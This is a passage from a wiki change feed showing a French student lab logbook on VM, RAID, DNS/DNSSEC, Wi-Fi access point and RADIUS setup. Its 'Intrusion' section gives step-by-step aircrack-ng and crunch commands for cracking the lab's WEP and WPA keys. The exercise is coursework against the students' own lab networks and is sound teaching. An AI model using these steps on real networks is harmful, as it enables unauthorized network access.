		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Dnsviz_detestable.png&amp;diff=60276"/>
				<updated>2022-11-29T00:00:38Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60275</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60275"/>
				<updated>2022-11-29T00:00:02Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Vérification : */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5.png]]&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
===DNS===&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.48&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  193.48.57.0/24;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===DNSSEC===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes;&lt;br /&gt;
dnssec-validation yes;&lt;br /&gt;
dnssec-lookaside auto;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Création du répertoire &amp;lt;code&amp;gt;detestable.site.dnssec&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;mkdir /etc/bind/detestable.site.dnssec/&lt;br /&gt;
cd /etc/bind/detestable.site.dnssec/&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Génération de la clef asymétrique de signature de clefs de zone :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA256 -b 2048 -f KSK -n ZONE detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mv Kdetestable.site.*.key detestable.site-ksk.key&lt;br /&gt;
mv Kdetestable.site.*.private detestable.site-ksk.private&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Génération de la clef asymétrique de signature des enregistrements :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA256 -b 2048 -n ZONE detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;mv Kdetestable.site.*.key detestable.site-zsk.key&lt;br /&gt;
mv Kdetestable.site.*.private detestable.site-zsk.private&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;$include &amp;amp;quot;/etc/bind/detestable.site.dnssec/detestable.site-ksk.key&amp;amp;quot;&lt;br /&gt;
$include &amp;amp;quot;/etc/bind/detestable.site.dnssec/detestable.site-zsk.key&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Signature des enregistrements de la zone :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o detestable.site -k detestable.site-ksk ../db.detestable.site detestable.site-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;demineur.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site.signed&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK (présente dans le fichier &amp;lt;code&amp;gt;detestable.site-ksk.key&amp;lt;/code&amp;gt;) à Gandi.&amp;lt;br /&amp;gt;&lt;br /&gt;
L’algorithme utilisé est le 8 (RSA/SHA-256).&lt;br /&gt;
&lt;br /&gt;
=== Tester DNSSEC : ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cd /etc/bind/&lt;br /&gt;
dnssec-verify -o detestable.site db.detestable.site.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Vérifier son DNS avec dnsviz ===&lt;br /&gt;
[[Fichier:dnsviz_detestable.jpg]]&lt;br /&gt;
&lt;br /&gt;
=Connexion wifi=&lt;br /&gt;
==Point d'accès wifi==&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
Mode terminal&lt;br /&gt;
 ap&amp;amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
Configuration du nom d’hôte :&lt;br /&gt;
 &amp;lt;pre&amp;gt;ap(config)#hostname SE2A5-AP1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accès SSH :&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Accès console :&lt;br /&gt;
 SE2A5-AP1(config)#line console 0&lt;br /&gt;
 SE2A5-AP1(config-line)#password glopglop&lt;br /&gt;
 SE2A5-AP1(config-line)#login authentification default&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Sécurisation des accès :&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
VLAN n°20&lt;br /&gt;
 &amp;lt;SE2A5-AP1(config)#aaa authentication login EAP_toto group RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config)#radius-server host 193.48.57.163 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 SE2A5-AP1(config)#aaa group server radius RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config-server)#server 193.48.57.163 auth-port 1812 acct-port 1813&lt;br /&gt;
 SE2A5-AP1(config-server)#exit&lt;br /&gt;
 SE2A5-AP1(config)#dot11 ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-ssid)#vlan 20&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication open eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication network-eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication key-management wpa&lt;br /&gt;
 SE2A5-AP1(config-ssid)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface g0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio 0&lt;br /&gt;
 SE2A5-AP2(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#encryption vlan 20 mode ciphers aes-ccm tkip&lt;br /&gt;
 SE2A5-AP1(config-if)#mbssid&lt;br /&gt;
 SE2A5-AP1(config-if)#ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyACM0&lt;br /&gt;
VLAN n°1 :&lt;br /&gt;
 SE2A5-AP1(config)#interface BVI 1&lt;br /&gt;
 SE2A5-AP1(config-if)#ip address 10.0.0.10 255.255.255.0&lt;br /&gt;
 SE2A5-AP1(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 SE2A5-AP1(config)#ip default-gateway 10.0.0.1&lt;br /&gt;
&lt;br /&gt;
== Configuration du serveur RADIUS ==&lt;br /&gt;
&lt;br /&gt;
Le serveur RADIUS permet l’authentification des utilisateurs qui se connectent aux points d’accès Wifi (WPA-EAP).&lt;br /&gt;
&lt;br /&gt;
* Installer le paquet &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install freeradius&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;client SE2A51 {&lt;br /&gt;
        ipaddr  = 10.0.0.10&lt;br /&gt;
        secret  = glopglop&lt;br /&gt;
}&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajouter un utilisateur en modifiant le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;pifou Cleartext-Password := &amp;amp;quot;pasglop&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enables/eap&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;eap {&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
  ...&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Arrêter le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; durant la phase de tests :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius stop&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Démarrer &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; en mode debug :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;freeradius -X&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pendant que &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; est en mode debug, tenter de se connecter au réseau Wifi qui a été créé et vérifier que celle-ci est prise en compte.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:freeradius_X.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut également voir la connexion de l'appareil sur minicom&lt;br /&gt;
&lt;br /&gt;
[[Fichier:connexion_minicom.png]]&lt;br /&gt;
&lt;br /&gt;
Si la connexion est validée alors la configuration est correcte. Dans ce cas, arrêter le programme de debug et réactiver le service.&lt;br /&gt;
&lt;br /&gt;
* Redémarrer le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60274</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60274"/>
				<updated>2022-11-28T23:59:35Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Serveur DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
